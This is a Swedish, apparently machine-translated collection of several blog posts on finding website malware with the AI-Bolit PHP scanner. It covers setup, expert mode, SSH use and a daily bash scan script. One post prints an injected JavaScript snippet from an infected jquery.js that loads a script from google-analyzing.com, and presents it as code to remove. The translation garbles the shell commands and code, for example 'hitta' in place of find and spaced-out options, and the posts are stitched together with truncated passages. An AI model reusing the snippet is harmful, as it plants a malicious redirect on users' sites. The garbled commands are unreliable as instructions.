Ai bolit paranoidläge. Hur man arbetar med AI-BOLIT-skannern från kommandoraden


Det finns en problematisk situation - en webbplats med virus.

Nu ska jag visa hur detta virus lätt kan hittas och förstöras. Det första du behöver göra är att ladda ner webbplatsen till lokalen - det är mycket lättare att kontrollera en mängd filer.

Den här texten är från videobeskrivningen, så den är lite kaotisk och tråkig. Men resten av mina skrifter)

Vi kommer att ladda ner filezilla. Jag kommer att ladda ner omedelbart till den installerade lokal server– Öppna server – för att kunna köra den lokalt behöver du den plötsligt.

Om du har ett antivirus installerat som skannar filer i farten finns det en chans att du hittar virus i vissa filer även under nedladdning. Titta i loggarna för mitt antivirusprogram.

I mitt fall min Microsoft säkerhet visade ingenting - viruset visade sig vara okänt för honom.

För att söka kommer jag att använda speciellt antivirus- Aibolit. Utvecklarwebbplats http://revisium.com/ai/
Jag råder dig att komma och titta på seminariet. Filerna laddas fortfarande ned, det kommer att ta lång tid. Jag har redan en färdig lokal kopia, jag lekte med detta antivirus igår.

Så för arbetet behöver vi fortfarande php för Windows. Ladda ner här http://windows.php.net/download/ senaste versionen för fönster i zip-arkiv e. Packa upp någonstans som passar dig.

OK. Förberedelserna är över. Nu till jobbet.

Ladda ner arkivet med iBolit.

Det finns tre mappar inuti:

  • ai-bolit är själva kärnan i antiviruset
  • kända_filer – versioner av antivirusfildatabaser för olika motorer
  • verktyg – hjälpverktyg.

Så låt oss börja behandla webbplatsen för virus.

  1. Kopiera alla filer från ai-bolit-mappen till roten på webbplatsen
  2. Om vi ​​vet vilken motor vi har väljer vi mappen med vårt CMS i mappen known_files och lägger alla filer i roten. I mitt fall WordPress-motor, då kommer vi att behandla virus med antivirusdatabaser för WordPress. Om du vill kolla allt i allmänhet kan du fylla i antivirusdatabaserna från alla motorer - kanske hittar den något mer)
  3. Jag glömde igen - du måste ange expertdriftläget i iBolit-inställningarna. För detta textredigerareöppna filen ai-bolit.php och hitta raden define(‘AI_EXPERT’, 0); ändra "0" till "1" och det är allt - expertläget är aktiverat.
  4. Nu måste vi packa upp vårt zip-arkiv med php i någon mapp där det skulle vara bekvämt att arbeta med det. Vi behöver en fil - php.exe
  5. Nu måste du springa körbar fil vårt antivirusprogram. För att göra detta, dubbelklicka på ai-bolit.php. Jag har redan ett val hur jag ska köra det här skriptet.

Jag skulle råda dig att bara behålla mappen för uppladdningar och din temamapp. Alla plugins kommer att laddas ner, inställningarna kommer att finnas kvar i databasen - virus kommer inte att röra dem. Kontrollera temat manuellt alla filer - lyckligtvis finns det inte många av dem där, om webbplatsen inte var upplagd av en klumpig layoutdesigner. Och fyll på allt annat i motorn. detta är det mest pålitliga sättet.

Och jag påminner dig också om att du med största sannolikhet har virus i hela ditt värdkonto (mycket sällan lyckas de hoppa mellan olika användares konton, bara om värdadministratören är en sned person.)

Om iBolit av någon anledning tas bort från sidan kan du alltid ladda ner antivirusprogrammet för sidan från mig

Virus är sorgligt(

PS: två artiklar om hur man rensar redan hittade virus:

  • Enklare - Hur man själv tar bort ett virus från en webbplats gratis
  • För avancerade -

AI-Bolit - effektiv skanner virus och annat skadlig kod på hosting

Vi får ofta frågan - vad är unikt med AI-Bolit-skannern? Hur skiljer det sig från andra liknande verktyg för upptäckt av skadlig programvara som maldet, clamav eller till och med skrivbordsantivirus? Det korta svaret är att det är bättre på att upptäcka skadlig kod skriven i PHP och Perl. Varför? Svaret finns nedan.

Varje dag blir skadlig kod (hackerwebbskal, bakdörrar, etc.) mer sofistikerad och komplex. Förutom identifieringsobfuskation och kodkryptering

Implicita funktionsanrop genom metoder med anropsbara argument, hanterare och indirekta funktionsanrop började användas överallt.

Det finns färre och färre skadliga skript med linjär struktur och fasta identifierare. De försöker dölja koden och göra den så föränderlig och "polymorf" som möjligt.

eller vice versa, gör det så enkelt som möjligt och liknar ett vanligt manus.

Ibland, när man analyserar ett skadligt skript, är det omöjligt att identifiera ett fast fragment med vilket "skadlig programvara" tydligt kunde identifieras. Uppenbarligen kan sådan skadlig kod inte hittas med en enkel signaturdatabas ( antivirusdatabas), som används i de allra flesta webbantivirus och värdbaserade skannrar. För effektiv sökning Modern skadlig programvara behöver använda mer sofistikerade tekniker för att identifiera virusmönster och i vissa fall heuristik. Det är exakt det tillvägagångssättet vi använder i AI-BOLIT skanning av skadlig programvara.
Använda en stor databas för att ständigt förbättra flexibla mönster baserat på reguljära uttryck, med hjälp av ytterligare heuristisk analys, genererad baserat på skanning stort antal infekterade webbplatser, gjorde AI-Bolit-skannern till det mest effektiva och aktivt använda verktyget för administratörer och webbutvecklare.

AI-Bolit fick också stor popularitet tack vare enkelt gränssnitt och möjligheter fri användning för icke-kommersiella ändamål. Alla webbansvariga kan ladda ner AI-Bolit helt gratis från den officiella webbplatsen http://revisium.com/ai/ och kontrollera sin resurs för förekomsten av hackerskal, bakdörrar, dörröppningar, virus, skräppostavsändare, dolda länkar och annat skadligt fragment och inlägg. Skannern används också aktivt av kommersiella företag - webbstudior, webbhotell och internetbyråer för att kontrollera och behandla klientsajter. Hosters integrerar AI-Bolit i sin kontrollpanel, webbutvecklare använder den för att söka efter skadlig kod och i sina egna webbövervakningstjänster.

Nedan är bara en liten lista över funktionerna hos Ai-Bolit-skannern:

  • starta från konsol och webbläsare
  • tre skanningslägen ("enkel", "expert", "paranoid") och två driftlägen ("express" och "full scan")
  • sök efter hacker php och perl-skript(skal, bakdörrar), virusinlägg, dörröppningar, skräppostavsändare, länksäljande skript, cloaking-skript och andra typer av skadliga skript. Sök efter mönster och reguljära uttryck och använd heuristik för att identifiera potentiellt skadlig kod
  • sök efter signaturer i krypterade, fragmenterade textblock och hex/oct/dec-kodade sekvenser
  • Sök misstänkta filer med konstruktioner som används i skadliga skript
  • hitta dolda länkar i filer
  • söker efter symboliska länkar
  • sök efter kod för sökning och mobila omdirigeringar och mycket mer.
Ai-Bolit fick förresten ett författarcertifikat från RosPatent. Skannern täcks också aktivt på tredjepartswebbplatser, i specialiserade tidskrifter, vid konferenser och webbseminarier.

Officiell manussida

AI-Bolit är avancerad gratis skanner bakdörrar, hackerskal, virus och dörröppningar. Skriptet kan söka efter skadlig och misstänkt kod i skript, upptäcker skräppostlänkar, visar CMS-versionen och inställningar som är kritiska för serversäkerheten.

Skannerns effektivitet ligger i användningen av mönster och heuristik, snarare än en konventionell hashsökning.

Skapelsens historia

I för närvarande marknaden för antivirusprogram personliga datorer extremt utvecklade: lösningar från Kaspersky, Dr.Web, McAfee, Norton, Avast och andra är allmänt kända. Saker och ting är inte så rosa med virus- och skadlig programvara för webbplatser. Systemadministratörer och webbplatsägare, oroade över problemet med att söka efter skadlig kod på sina servrar, tvingas använda hemskrivna skript som söker efter virus och skal med hjälp av vissa fragment som samlats in tidigare. Jag gjorde detsamma. Jag samlade in skal, virus, bakdörrar och omdirigeringskoder från klientwebbplatser och bildade gradvis en databas med skadliga kodsignaturer. Och för att göra det bekvämt att använda skrev jag ett litet skript i PHP.

Efter hand fick skannern användbar funktionalitet, och till slut blev det uppenbart att den kunde vara användbar inte bara för mig.
I april 2012 tillkännagav jag AI-Bolit-skriptet på flera forum, och sex månader senare blev det huvudverktyget för att söka efter skadlig kod bland webbansvariga och värdadministratörer. När det gäller den sammanfattande statistiken, på ett och ett halvt år laddades skriptet ner mer än 64 tusen gånger. Manuset fick även ett copyrightcertifikat från Rospatent.

Skannerfunktioner

Den största skillnaden mellan AI-Bolit och befintliga virus- och skadliga kodskannrar på servern är användningen av mönster som virussignaturer. Sökningen efter skadlig kod sker med hjälp av en databas med reguljära uttryck, inte en hash eller kontrollsummor, vilket gör att du kan upptäcka även modifierade och obfuskerade skal infogade i CMS-mallar eller skript.

Skannern kan arbeta i snabbskanning(endast för PHP, HTML, JS, htaccess-filer), i "expert"-läge, exkludera kataloger och filer med mask. Den har också en stor databas med vita CRC-ark populärt CMS, vilket avsevärt minskar antalet falska positiva.

För närvarande innehåller skannerdatabasen mer än 700 signaturer av skadliga skript. Signaturerna är vanliga uttryck, som låter dig hitta till exempel obfuskerade skal och bakdörrar som varken LMD med ClamAV eller ens skrivbordsantivirus hittar:

Signaturdatabasen uppdateras regelbundet med nya prover som hittas både av experter från Revision och av användare av skriptet, vilket gör att du kan hålla skannern uppdaterad.

AI-Bolit-gränssnitt

AI-Bolit-gränssnittet är väldigt enkelt. Detta är ett PHP-skript som kan köras in kommandorad via PHP CLI eller öppna i en webbläsare med URL:en http://site/ai-bolit.php?p=password.

Resultatet av manuset är en rapport som består av fyra avsnitt:

  1. Statistik och allmän information om manuset.
  2. Röd del av kritiska kommentarer med en lista över hittade skal, virus och annan skadlig kod (eller fragment som liknar skadlig kod).
  3. Orange varningssektion (misstänkta kodfragment som ofta används i hackningsverktyg).
  4. Blå rekommendationssektion (lista över kataloger som är öppna för skrivning, PHP-inställningar Och så vidare).

Användaren analyserar den mottagna rapporten genom att se utdrag, hittar och tar bort skadliga skript och kodfragment manuellt med hjälp av kommandoradsverktyg eller program för att söka och ersätta strängar i filer.

Det största problemet som en virusskannerutvecklare vanligtvis står inför är att hitta den gyllene medelvägen mellan skannerns "paranoiditet" (känslighet) och antalet falska positiva. Om du bara använder fasta strängar för att söka efter skadlig kod, blir skannerns effektivitet låg, eftersom dunkla fragment, kod med mellanslag och tabbar eller smart formaterad kod inte kommer att hittas. Om du söker med flexibla mönster är det stor sannolikhet för falska positiva resultat när garanterat säkra skript markeras som skadliga.

I AI-Bolit bestämmer jag det här problemet genom att använda två driftlägen (“normal”/“expert”) och vita ark för välkända CMS.

Framtiden för AI-Bolit

Planerna för utvecklingen av manuset inkluderar: Ett stort antal användbara funktioner och integration med andra antiviruslösningar. En av nyckelordär integrationen av AI-Bolit med ClamAV- och LMD-databaser. På så sätt kommer AI-BOLIT att kunna söka efter rootkits och skal med hjälp av kontrollsummor.

Den andra viktiga saken i kön för implementering är användarvänligt gränssnitt för att analysera tabellrapporter med sökning och flexibla filter. Det kommer att vara möjligt att filtrera bort hittade filer efter tillägg, sortera efter storlek, kontrollsummor och så vidare.

Den tredje punkten är implementeringen av asynkron skanning med AJAX, vilket kommer att lösa problemet med att genomsöka webbplatser på svaga värdar som har begränsad CPU-förbrukning eller skriptkörningstid. För närvarande kan detta endast lösas genom att skanna en kopia av webbplatsen lokalt eller på en annan, kraftfullare server. Och naturligtvis, ständiga uppdateringar databas med skadliga kodsignaturer.

Till sist

Skriptkoden är öppen, publicerad på GitHub, så vem som helst kan bidra till utvecklingen det här projektet. Skicka dina förslag och önskemål till mig på [e-postskyddad].

Förmodligen stöter alla som skapar hemsidor på virus och trojaner på sajten. Det första problemet är att upptäcka problemet i tid, innan projekten blir pessimistiska från sökmotorer eller blir betungande för hostaren (för DDoS, spam).

Den här artikeln skrivs i jakten när, under en vanlig säkerhetskopiering till en maskin som kör Windows, webbplatsens källkod ESET Smart Säkerheten började plötsligt svära åt bilderna, som den ansåg vara ett virus. Det visade sig att FilesMan-bakdörren laddades upp till webbplatsen med hjälp av bilderna.

Hålet var att skriptet som gjorde det möjligt för användare att ladda upp bilder till sajten kontrollerade att bilden endast laddades av filtillägget. Innehållet har inte kontrollerats alls. Det finns inget behov av att göra detta;) Som ett resultat var det möjligt att ladda upp till webbplatsen vilken php som helst fil under täckmantel av en bild. Men vi pratar inte om hål...

Poängen är att uppgiften uppstod att dagligen kontrollera alla webbplatsfiler för virus och trojaner.

Kontrollera en webbplats för virus online

Onlinekontroller av någon webbplats för virus är inte alls lämpliga för dessa ändamål. Online skannrar beter sig som en sökmotorrobot och går igenom alla tillgängliga sidor på webbplatsen i följd. Övergången till nästa sida på webbplatsen sker genom länkar från andra sidor på webbplatsen. Resp. om en angripare laddade upp en bakdörr till din webbplats med hjälp av en bild och det inte finns någon länk till denna bild någonstans på webbplatsens sidor och inte förstörde webbplatsen, precis som att lägga ett virus på sidorna, då check online Webbplatsen för virus hittar helt enkelt inte den här bilden och hittar inte viruset.

Varför, frågar du, skulle en angripare göra det här? Varför ladda upp en bakdörr och inte göra någonting? Jag svarar – för spam, för DDoS. För en annan skadlig aktivitet, vilket inte återspeglas på något sätt på webbplatsens sidor.

Med ett ord, att kontrollera en webbplats online för virus är helt värdelös för fullständig sinnesfrid.

Plugin för att kontrollera en WordPress-webbplats för virus och trojaner

Det finns ett utmärkt antivirusplugin för WordPress. Det heter . I mitt fall hittade den perfekt bilder från FilesMan och rensade webbplatsen från virus. Men det har en viktig nackdel. Under skanningen lägger den en enorm belastning på servern eftersom den helt enkelt går igenom alla filer sekventiellt. Dessutom görs utcheckning endast manuellt. Det är inte möjligt att automatisera webbplatsverifiering med ett plugin.

Tja, du kan fånga ett virus utan att använda WordPress, du behöver något universellt.

Kontrollera webbplatsens innehåll med ett vanligt antivirusprogram

Som nämnts ovan upptäcktes problemen helt av en slump av ett vanligt skrivbordsantivirus under en säkerhetskopiering. Naturligtvis kan du ladda ner hela sidan varje dag och skanna den med ett vanligt antivirusprogram. Allt detta är ganska genomförbart.

  • För det första vill jag ha automatisering. Så att checken är inne automatiskt läge och utifrån resultatet fanns en färdig rapport.
  • för det andra, det finns webbplatser som att ladda ner dem varje gång helt enkelt inte är realistiskt,

Testar AI-Bolit

Jag försenade något med inledningen. Till slut alla sökning hittades skön Gratis antivirus för webbplatsen. . Detta antivirus innebär olika scheman för dess användning. Jag använde den via ssh.

Jag har inte räknat ut om det kan användas på delad värd, men jag tror att det är möjligt. AI-Bolit är skrivet i PHP och kan startas från en webbläsare. Därför, rent tekniskt, är det förmodligen möjligt på en delad plattform.

Viktig! Aibolit behandlar inte en webbplats för virus - den HITTER dem BARA och ger en rapport om vilka filer den anser vara farliga. Och du bestämmer själv vad du ska göra med dem. Därför kommer det inte att fungera att helt enkelt dumt trycka på en knapp och bota webbplatsen från trojaner.

Hur man använder AI-Bolit på VDS med ssh

Aibolit har instruktioner och masterclasses om hur du använder detta antivirus. I allmänhet är sekvensen enkel:

  • ladda ner
  • packa upp till servern (jag packade upp till /root/ai)
  • sedan från ssh-konsolen kör php /root/ai/ai-bolit/ai-bolit.php
  • verifiering kan ta timmar, beroende på storleken på webbplatsen
  • Baserat på resultatet av kontrollen kommer en rapportfil AI-BOLIT-REPORT- att genereras<дата>-<время>.html

Rapportfilen visar eventuella problematiska filer.

Tung belastning på servern

Det största problemet du står inför automatisk kontroll webbplats för virus - detta är belastningen på servern. Alla antivirus fungerar på samma sätt och söker sekventiellt igenom alla tillgängliga filer. Och aibolit verkar inte vara något undantag här. Det tar helt enkelt alla filer och kontrollerar dem en efter en. Lasten hoppar och detta kan pågå länge, vilket inte är acceptabelt i produktionen.

Men Aybolit har en fantastisk möjlighet (förutsatt att du har en fullfjädrad server eller VDS med root-åtkomst). Först, för Aibolit, kan du skapa en lista med filer att kontrollera och sedan mata den här listan. Då kommer Aibolit helt enkelt att köra igenom den här listan.

För att skapa en lista kan du använda vilken servermetod som helst. Jag slutade med detta bash script:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="site" AI_PATH="/root/ai" NOW=$(date +" %F-%k-%M-%S") # du kan skapa en allmän mapp med lösenordsåtkomst REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Skanna endast filer ändrade i X dagar # AI-BOLIT-DOUBLECHECK.php är hårdkodad av AIbolit på --with-2check !!! hitta $SCAN_PATH -typ f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #hitta $SCAN_PATH -typ f -namn "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #hitta $SCAN_PATH -typ f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #hitta $SCAN_PATH -typ f -namn "*.ph*" -o -namn "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

# bash /root/ai/run.sh

# https://revisium.com/kb/ai-bolit-console-faq.html

DOMAIN = "webbplats"

AI_PATH = "/root/ai"

NU = $(datum + "%F-%k-%M-%S")

# du kan skapa en offentlig mapp med lösenordsåtkomst

REPORT_PATH = "$AI_PATH/reports/$DOMAIN-$NOW.html"

SCAN_PATH = "/home/azzrael/web/$DOMAIN/public_html/"

SCAN_DAYS = 90

#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH

php "$AI_PATH/ai-bolit/ai-bolit.php"-- mode = 1 -- rapport = $REPORT_PATH -- med - 2check

#historia -c

Här är det tydligt att genom hitta kommando Vi samlar alla filer som skapats under de senaste SCAN_DAYS, sparar dem i listan AI-BOLIT-DOUBLECHECK.php (förresten, det var omöjligt att byta namn på listfilen vid användningstillfället), sedan matar vi denna lista till Aibolit . SCAN_DAYS kan vara lika med en dag. Om du lägger in bash /root/ai/run.sh i det dagliga cronet, kanske listan över filer som ska skannas inte är särskilt stor. Resp. kontrollen kommer inte att ta mycket tid och kommer inte att belasta servern hårt.

Idag bad de mig om hjälp med att rensa en webbutik från virus. Oväntat fick en av de anställda ett avslag på Google-annonsering AdWords. Brevet angav det i akten jquery.js En misstänkt kod har angetts.

Först och främst öppnade jag sökvägen till den här filen med en webbläsare, men Avast antivirus svarade inte på den här filen, även om jag visuellt redan sett den skadliga koden. Jag anslöt sedan via ftp med FileZilla och försökte öppna filen med Notepad++. Och här blockerade mitt antivirus åtkomst till den här filen.

För att rensa js-filen från viruset var jag tvungen att inaktivera AVAST i 10 minuter och sedan ta bort skadliga rader från filen.

Om du stöter på liknande problem, radera följande kod som visas på bilden, eller dessa rader.

Var r=dokument.referrer; var c=document.cookie; rl=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=ons, 1 mars 2020 00:00:00; path=/;"; r1=1; ) else (if (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; expires=ons, 1 mars 2020 00:00:00; path=/;";)) if ((c.indexOf("__ga1" )>-1) ||. (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing) .com/urchin.js" type="text/javascript"%3E%3C/script%3E"));)

Säkerhetskopiering av webbplatsen.

Därefter ansluter vi via ssh-åtkomst, till exempel med hjälp av kittverktyget och, om möjligt, gör ett arkiv av webbplatsen. För att göra detta, använd bara följande kommando i konsolen:

tar - cf backup .tar /home/login/site/public_html


*/home/login/site/public_html - fullständig sökväg till webbplatsens huvudkatalog

Du behöver inte göra en säkerhetskopia av webbplatsen, men hur troligt är det att något viktigt tas bort?

Det finns nu två alternativ för att kontrollera en webbplats för virus

1. Kolla sajten med använder php Ai-Bolit-skript som söker olika virus samt php-skal.

2. Ladda ner hela webbplatsen till din dator och kör den Avast antivirus, men det första alternativet är mycket bättre, bekvämare och mycket högre kvalitet.

Rensa en webbplats på din lokala dator

Jag använde först den andra metoden, så jag ska beskriva den. Efter att alla filer (eller arkiv) laddats ner till datorn, och det fanns en hel del 25 000 av dem, öppnade jag Avast och specificerade mappen med webbplatsfilerna för att skanna dem efter skadliga skript.

Efter att Avast utfört en genomsökning upptäcktes två skriptvirus i mappen för webbplatsfiler:

  • Php-Shell-Jv
  • Js-Redirector-Fc

Filen index.php bestod av följande kod:

I javascript-fil"ui.datepicker_old.js" var skadlig kod längst ner i skriptinnehållet. Denna kod måste tas bort!

Rensa en webbplats från virus med Ai-Bolit.

Ftp-metoden.

1. Ladda upp arkivet med Aibolit-skriptet till lokal dator och packa upp den.

2. Anslut via ftp med FileZilla-klienten

3. Placera de uppackade arkivfilerna i huvudkatalogen på webbplatsen /home/din webbplats/public_html

4. Kör skriptet http://din domän/ai-bolit.php

5. Rapportfilen skapas i huvudkatalogen med namnet AI-BOLIT-REPORT.html

Om efter att ha kört skriptet visas ett tomt Vit skärm, Betyder php version på värdens server är inte lämplig för Aibolit.

Uppmärksamhet! Om du behöver kontrollera alla webbplatser i en katalog, ladda upp skriptet till mappen /home/domains/ eller /home/, då kommer Ai-Bolit rekursivt att gå igenom alla mappar och utfärda en rapport, men det verkar som om det är bättre att kontrollera en domän i taget.

Konsolalternativ (SSH)

1. Starta Kittprogram, eller annat konsolprogram.

2. Anslut till servern med hjälp av värden och lösenordet.

3. Gå till webbplatsens huvudkatalog med kommandot cd /home/din inloggning/din webbplats/public_html/

4. Ladda skriptet med kommandot wget http://www..zip

5. Packa upp zip-arkivet med kommandot packa upp 20160904_112415ai-bolit.zip

6. Kör skriptet php ai-bolit.php

Att springa in bakgrund använd kommandot: screen -d -m php ai-bolit.php

7. Vi väntar på att skriptet ska utföra kontrollen och skapa en rapport som " AI-BOLIT-REPORT.html" på servern.

Observera också att om php är installerat på din server under 5.3 kommer Aibolit att visa ett fel och kommer inte att börja skanna. I mitt fall var jag tvungen att ladda ner sidan och kontrollera den på min server.

Efter att rapportfilen har skapats på servern kan du ladda ner den till din dator och visa den med en vanlig webbläsare (Chrome, Firefox, etc.).

Först och främst bör du vara uppmärksam på rapporten om "skadliga skript" och sedan antingen försiktigt ta bort dessa filer eller rensa manuellt som jag gör.







2024 gtavrl.ru.